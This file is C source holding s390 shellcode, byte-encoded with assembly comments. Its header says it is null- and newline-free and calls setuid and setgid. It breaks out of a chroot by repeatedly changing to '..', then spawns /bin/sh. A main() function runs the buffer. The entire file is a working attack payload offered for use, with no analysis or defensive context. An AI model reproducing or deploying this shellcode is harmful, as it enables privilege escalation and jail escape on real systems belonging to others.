/*----------------------------------------------------------------------*/
/* s390 shellcode 0x0a / 0x0 free                                       */
/* setuid / setgid / chroot break                                       */
/* code jcyberpunk@thehackerschoice.com                                 */
/*----------------------------------------------------------------------*/
char shellcode[] =
"\x0d\x10"              /* basr %r1,0                                   */
"\x41\x90\x10\x98"      /* la   %r9,152(%r1)                            */
"\xa7\xa8\xfb\xb4"      /* lhi  %r10,-1100                              */
"\xa7\x68\x04\x56"      /* lhi  %r6,1110                                */
"\x1a\x6a"              /* ar   %r6,%r10                                */
"\x42\x60\x10\x98"      /* stc  %r6,152(%r1)                            */
"\x17\x22"              /* xr   %r2,%r2                                 */
"\x42\x20\x10\x9f"      /* stc  %r2,159(%r1)                            */
"\x0d\xe9"              /* basr %r14,%r9                                */
"\xa7\x68\x04\x7a"      /* lhi  %r6,1146                                */
"\x1a\x6a"              /* ar   %r6,%r10                                */
"\x42\x60\x10\x99"      /* stc  %r6,153(%r1)                            */
"\x0d\xe9"              /* basr %r14,%r9                                */
"\x41\x20\x10\x9c"      /* la   %r2,156(%r1)                            */
"\x17\x33"              /* xr   %r3,%r3                                 */
"\xa7\x68\x04\x73"      /* lhi  %r6,1139                                */
"\x1a\x6a"              /* ar   %r6,%r10                                */
"\x42\x60\x10\x99"      /* stc  %r6,153(%r1)                            */
"\x0d\xe9"              /* basr %r14,%r9                                */
"\x41\x20\x10\x9c"      /* la   %r2,156(%r1)                            */
"\xa7\x68\x04\x89"      /* lhi  %r6,1161                                */
"\x1a\x6a"              /* ar   %r6,%r10                                */
"\x42\x60\x10\x99"      /* stc  %r6,153(%r1)                            */
"\x0d\xe9"              /* basr %r14,%r9                                */
"\xa7\xb8\x05\x39"      /* lhi  %r11,1337                               */
"\x1a\xba"              /* ar   %r11,%r10                               */
"\xa7\x68\x04\x58"      /* lhi  %r6,1112                                */
"\x1a\x6a"              /* ar   %r6,%r10                                */
"\x42\x60\x10\x99"      /* stc  %r6,153(%r1)                            */
"\x41\x20\x10\x9d"      /* la   %r2,157(%r1)                            */
"\x0d\xe9"              /* basr %r14,%r9                                */
"\x46\xb0\x10\x58"      /* bct  %r11,88(%r1)                            */
"\x41\x20\x10\x9e"      /* la   %r2,158(%r1)                            */
"\xa7\x68\x04\x89"      /* lhi  %r6,1161                                */
"\x1a\x6a"              /* ar   %r6,%r10                                */
"\x42\x60\x10\x99"      /* stc  %r6,153(%r1)                            */
"\x0d\xe9"              /* basr %r14,%r9                                */
"\xa7\x68\x04\x57"      /* lhi  %r6,1111                                */
"\x1a\x6a"              /* ar   %r6,%r10                                */
"\x42\x60\x10\x99"      /* stc  %r6,153(%r1)                            */
"\x41\x20\x10\xa0"      /* la   %r2,160(%r1)                            */
"\x50\x20\x10\xa8"      /* st   %r2,168(%r1)                            */
"\x41\x30\x10\xa8"      /* la   %r3,168(%r1)                            */
"\x17\x44"              /* xr   %r4,%r4                                 */
"\x42\x40\x10\xa7"      /* stc  %r4,167(%r1)                            */
"\x50\x40\x10\xac"      /* st   %r4,172(%r1)                            */
"\x41\x40\x10\xac"      /* la   %r4,172(%r1)                            */
"\x0d\xe9"              /* basr %r14,%r9                                */
"\x0b\x17"              /* svc  23              <--- after modification */
"\x07\xfe"              /* br   %r14                                    */
"\x41\x2e\x2e\x5c"      /* A..  <---- used for mkdir,chroot,chdir       */
"\x2f\x62\x69\x6e"      /* /bin                                         */
"\x2f\x73\x68\x5c";     /* /sh\\                                        */

main()
{
 void (*z)()=(void*)shellcode;
 z();
}